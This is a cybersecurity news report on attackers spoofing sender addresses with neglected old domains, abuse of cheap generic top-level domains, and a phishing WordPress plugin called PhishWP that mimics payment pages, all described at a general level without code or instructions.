Cybersecurity researchers have identified a growing trend of malicious actors successfully spoofing sender email addresses as part of various malspam campaigns.

Faking the sender address of an email is widely seen as an attempt to make the digital message more legitimate and evade security mechanisms that could otherwise flag it as malicious.

Despite the existence of safeguards such as DomainKeys Identified Mail (DKIM), Domain-based Message Authentication, Reporting and Conformance (DMARC), and Sender Policy Framework (SPF) that can be used to prevent spammers from spoofing well-known domains, these measures have increasingly led them to leverage old, neglected domains in their operations.

In doing so, the email messages are likely to bypass security checks that rely on the domain age as a means to identify spam.

DNS threats have become a significant concern, with malicious actors exploiting neglected domains to evade security checks.

The development comes as generic top-level domains (gTLDs) such as .top, .xyz, .shop, .vip, and .club have accounted for 37% of cybercrime domains reported between September 2023 and August 2024, despite holding only 11% of the total domain name market, according to a report from the Interisle Consulting Group.

These domains have become lucrative for malicious actors due to low prices and a lack of registration requirements, thereby opening doors for abuse. Among the gTLDs widely used for cybercrime, 22 offered registration fees of less than $2.00.

Threat actors have also been discovered advertising a malicious WordPress plugin called PhishWP that can be used to create customizable payment pages mimicking legitimate payment processors like Stripe to steal personal and financial data via Telegram.

“Attackers can either compromise legitimate WordPress websites or set up fraudulent ones to install it,” SlashNext said in a new report. “After configuring the plugin to mimic a payment gateway, unsuspecting users are lured into entering their payment details. The plugin collects this information and sends it directly to attackers, often in real-time.”